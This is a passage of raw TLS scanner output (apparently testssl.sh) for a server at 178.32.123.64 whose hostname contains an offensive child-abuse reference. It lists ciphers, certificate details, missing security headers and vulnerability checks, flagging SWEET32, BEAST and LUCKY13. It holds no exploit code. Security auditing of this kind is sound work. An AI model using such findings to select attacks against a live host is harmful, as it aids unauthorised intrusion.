6239 DHE-RSA-CAMELLIA128-SHA EDH-RSA-DES-CBC3-SHA
6240 TLSv1.2: ECDHE-RSA-AES256-GCM-SHA384 ECDHE-RSA-AES128-GCM-SHA256
6241 ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES128-SHA256
6242 ECDHE-RSA-AES128-SHA AES128-SHA DES-CBC3-SHA
6243 ECDHE-RSA-AES256-SHA ECDHE-RSA-DES-CBC3-SHA
6244 DHE-RSA-AES256-GCM-SHA384 DHE-RSA-AES256-SHA256
6245 DHE-RSA-AES256-SHA DHE-RSA-CAMELLIA256-SHA
6246 DHE-RSA-AES128-GCM-SHA256 DHE-RSA-AES128-SHA256
6247 DHE-RSA-AES128-SHA DHE-RSA-SEED-SHA DHE-RSA-CAMELLIA128-SHA
6248 EDH-RSA-DES-CBC3-SHA
6249
6250
6251[1m[4m Testing server defaults (Server Hello) [m
6252
6253[1m TLS extensions (standard) [m"renegotiation info/#65281"
6254 "EC point formats/#11" "session ticket/#35"
6255 "heartbeat/#15"
6256 "application layer protocol negotiation/#16"
6257[1m Session Ticket RFC 5077 hint [m300 seconds, session tickets keys seems to be rotated < daily
6258[1m SSL Session ID support [myes
6259[1m Session Resumption [mTickets no, ID: yes
6260[1m TLS clock skew[m Random values, no fingerprinting possible
6261[1m Signature Algorithm [m[0;32mSHA256 with RSA[m
6262[1m Server key size [mRSA 2048 bits
6263[1m Fingerprint / Serial [mSHA1 0054BF5D1C8F87CB5A4E695A3B59226C0A2F6384 / 481102BEE6E15AA686DE919906E44B6A
6264 SHA256 3035D355E9967C9CDBA7BDA365A0AD71CC4FDC5561D25B09753F99C8B05A7A8C
6265[1m Common Name (CN) [m[3m*.motion-twin.com[m
6266[1m subjectAltName (SAN) [m[3m*.motion-twin.com motion-twin.com [m
6267[1m Issuer [m[3mGandi Standard SSL CA 2[m ([3mGandi[m from [3mFR[m)
6268[1m Trust (hostname) [m[0;31mcertificate does not match supplied URI[m (same w/o SNI)
6269[1m Chain of trust[m [0;32mOk [m[0;35m[m
6270[1m EV cert[m (experimental) no
6271[1m Certificate Expiration [m[0;32m81 >= 60 days[m (2016-01-21 19:00 --> 2018-02-19 18:59 -0500)
6272[1m # of certificates provided[m 3
6273[1m Certificate Revocation List [mhttp://crl.usertrust.com/GandiStandardSSLCA2.crl
6274[1m OCSP URI [mhttp://ocsp.usertrust.com
6275[1m OCSP stapling [m[1;33m--[m
6276[1m OCSP must staple [mno
6277[1m DNS CAA RR[m (experimental) [1;33m--[m
6278[1m Certificate Transparency [mno
6279
6280
6281[1m[4m Testing HTTP header response @ "/" [m
6282
6283[1m HTTP Status Code [m 200 OK
6284[1m HTTP clock skew [m0 sec from localtime
6285[1m Strict Transport Security [m--
6286[1m Public Key Pinning [m--
6287[1m Server banner [mApache
6288[1m Application banner [m--
6289[1m Cookie(s) [m(none issued at "/")
6290[1m Security headers [m[0;33m--[m
6291[1m Reverse Proxy banner [m--
6292
6293
6294[1m[4m Testing vulnerabilities [m
6295
6296[1m Heartbleed[m (CVE-2014-0160) [1;32mnot vulnerable (OK)[m, timed out
6297[1m CCS[m (CVE-2014-0224) [1;32mnot vulnerable (OK)[m
6298[1m Ticketbleed[m (CVE-2016-9244), experiment. [1;32mnot vulnerable (OK)[m
6299[1m Secure Renegotiation [m(CVE-2009-3555) [1;32mnot vulnerable (OK)[m
6300[1m Secure Client-Initiated Renegotiation [m[0;32mnot vulnerable (OK)[m
6301[1m CRIME, TLS [m(CVE-2012-4929) [0;32mnot vulnerable (OK)[m
6302[1m BREACH[m (CVE-2013-3587) [1;32mno HTTP compression (OK) [m - only supplied "/" tested
6303[1m POODLE, SSL[m (CVE-2014-3566) [1;32mnot vulnerable (OK)[m
6304[1m TLS_FALLBACK_SCSV[m (RFC 7507) [0;32mDowngrade attack prevention supported (OK)[m
6305[1m SWEET32[m (CVE-2016-2183, CVE-2016-6329) [1;33mVULNERABLE[m, uses 64 bit block ciphers
6306[1m FREAK[m (CVE-2015-0204) [1;32mnot vulnerable (OK)[m
6307[1m DROWN[m (CVE-2016-0800, CVE-2016-0703) [1;32mnot vulnerable on this host and port (OK)[m
6308 make sure you don't use this certificate elsewhere with SSLv2 enabled services
6309 https://censys.io/ipv4?q=3035D355E9967C9CDBA7BDA365A0AD71CC4FDC5561D25B09753F99C8B05A7A8C could help you to find out
6310[1m LOGJAM[m (CVE-2015-4000), experimental [1;33mCommon prime with 2048 bits detected: [m[3mRFC3526/Oakley Group 14[m,
6311 but no DH EXPORT ciphers
6312[1m BEAST[m (CVE-2011-3389) TLS1: [1;33mECDHE-RSA-AES128-SHA
6313 AES128-SHA DES-CBC3-SHA
6314 ECDHE-RSA-AES256-SHA
6315 ECDHE-RSA-DES-CBC3-SHA
6316 DHE-RSA-AES256-SHA
6317 DHE-RSA-CAMELLIA256-SHA
6318 DHE-RSA-AES128-SHA
6319 DHE-RSA-SEED-SHA
6320 DHE-RSA-CAMELLIA128-SHA
6321 EDH-RSA-DES-CBC3-SHA [m
6322 [1;33mVULNERABLE[m -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
6323[1m LUCKY13[m (CVE-2013-0169), experimental potentially [1;33mVULNERABLE[m, uses cipher block chaining (CBC) ciphers with TLS
6324[1m RC4[m (CVE-2013-2566, CVE-2015-2808) [0;32mno RC4 ciphers detected (OK)[m
6325
6326
6327[1m[4m Testing 364 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength [m
6328
6329Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
6330-----------------------------------------------------------------------------------------------------------------------------
6331 xc030 ECDHE-RSA-AES256-GCM-SHA384 ECDH[0;32m 256[m AESGCM 256 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
6332 xc028 ECDHE-RSA-AES256-SHA384 ECDH[0;32m 256[m AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
6333 xc014 ECDHE-RSA-AES256-SHA ECDH[0;32m 256[m AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
6334 x9f DHE-RSA-AES256-GCM-SHA384 DH[0;32m 2048[m AESGCM 256 TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
6335 x6b DHE-RSA-AES256-SHA256 DH[0;32m 2048[m AES 256 TLS_DHE_RSA_WITH_AES_256_CBC_SHA256
6336 x39 DHE-RSA-AES256-SHA DH[0;32m 2048[m AES 256 TLS_DHE_RSA_WITH_AES_256_CBC_SHA
6337 x88 DHE-RSA-CAMELLIA256-SHA DH[0;32m 2048[m Camellia 256 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
6338 xc02f ECDHE-RSA-AES128-GCM-SHA256 ECDH[0;32m 256[m AESGCM 128 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
6339 xc027 ECDHE-RSA-AES128-SHA256 ECDH[0;32m 256[m AES 128 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
6340 xc013 ECDHE-RSA-AES128-SHA ECDH[0;32m 256[m AES 128 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
6341 x9e DHE-RSA-AES128-GCM-SHA256 DH[0;32m 2048[m AESGCM 128 TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
6342 x67 DHE-RSA-AES128-SHA256 DH[0;32m 2048[m AES 128 TLS_DHE_RSA_WITH_AES_128_CBC_SHA256
6343 x33 DHE-RSA-AES128-SHA DH[0;32m 2048[m AES 128 TLS_DHE_RSA_WITH_AES_128_CBC_SHA
6344 x9a DHE-RSA-SEED-SHA DH[0;32m 2048[m SEED 128 TLS_DHE_RSA_WITH_SEED_CBC_SHA
6345 x45 DHE-RSA-CAMELLIA128-SHA DH[0;32m 2048[m Camellia 128 TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA
6346 x2f AES128-SHA RSA AES 128 TLS_RSA_WITH_AES_128_CBC_SHA
6347 xc012 ECDHE-RSA-DES-CBC3-SHA ECDH[0;32m 256[m 3DES 168 TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
6348 x16 EDH-RSA-DES-CBC3-SHA DH[0;32m 2048[m 3DES 168 TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
6349 x0a DES-CBC3-SHA RSA 3DES 168 TLS_RSA_WITH_3DES_EDE_CBC_SHA
6350
6351
6352[1m[4m Running client simulations via sockets [m
6353
6354 Android 2.3.7 TLSv1.0 AES128-SHA
6355 Android 4.1.1 TLSv1.0 ECDHE-RSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
6356 Android 4.3 TLSv1.0 ECDHE-RSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
6357 Android 4.4.2 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
6358 Android 5.0.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
6359 Android 6.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
6360 Android 7.0 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
6361 Chrome 51 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
6362 Chrome 57 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
6363 Firefox 49 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
6364 Firefox 53 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
6365 IE 6 XP No connection
6366 IE 7 Vista TLSv1.0 ECDHE-RSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
6367 IE 8 XP TLSv1.0 DES-CBC3-SHA
6368 IE 8 Win 7 TLSv1.0 ECDHE-RSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
6369 IE 11 Win 7 TLSv1.2 ECDHE-RSA-AES256-SHA384, [0;32m256 bit ECDH (P-256)[m
6370 IE 11 Win 8.1 TLSv1.2 ECDHE-RSA-AES256-SHA384, [0;32m256 bit ECDH (P-256)[m
6371 IE 11 Win Phone 8.1 Update TLSv1.2 ECDHE-RSA-AES256-SHA384, [0;32m256 bit ECDH (P-256)[m
6372 IE 11 Win 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
6373 Edge 13 Win 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
6374 Edge 13 Win Phone 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
6375 Opera 17 Win 7 TLSv1.2 ECDHE-RSA-AES128-SHA256, [0;32m256 bit ECDH (P-256)[m
6376 Safari 5.1.9 OS X 10.6.8 TLSv1.0 ECDHE-RSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
6377 Safari 7 iOS 7.1 TLSv1.2 ECDHE-RSA-AES256-SHA384, [0;32m256 bit ECDH (P-256)[m
6378 Safari 9 OS X 10.11 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
6379 Safari 10 OS X 10.12 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
6380 Apple ATS 9 iOS 9 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
6381 Tor 17.0.9 Win 7 TLSv1.0 ECDHE-RSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
6382 Java 6u45 TLSv1.0 AES128-SHA
6383 Java 7u25 TLSv1.0 ECDHE-RSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
6384 Java 8u31 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
6385 OpenSSL 1.0.1l TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
6386 OpenSSL 1.0.2e TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
6387
6388[7m Done 2017-11-30 01:32:52 [ 250s] -->> 178.32.123.64:443 (pedo-paradise.myminicity.fr) <<--[m
6389#######################################################################################################################################